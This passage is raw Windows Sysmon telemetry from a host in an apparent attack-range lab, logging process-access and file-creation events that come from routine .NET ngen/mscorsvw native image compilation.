+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D5-6005-5001-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.689{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D5-6005-5001-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:53.689{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D5-6005-5001-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:53.595{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\580-0\Microsoft.VisualBasic.dll2021-01-18 13:44:53.595 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:54.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.751{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:54.751{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D6-6005-5301-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.689{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D6-6005-5301-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.689{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D6-6005-5301-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:54.611{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1008-0\System.DirectoryServices.dll2021-01-18 13:44:54.611 10341000x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.814{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.798{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:55.798{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D7-6005-5501-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.329{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D7-6005-5501-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.329{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D7-6005-5501-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:55.267{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b90-0\System.Transactions.dll2021-01-18 13:44:55.267 10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.954{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5B01-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.939{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5B01-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:57.939{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5B01-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:57.876{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\121c-0\System.Configuration.Install.dll2021-01-18 13:44:57.876 10341000x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:57.751{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.736{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:57.736{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5901-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.626{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5901-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.626{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5901-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windo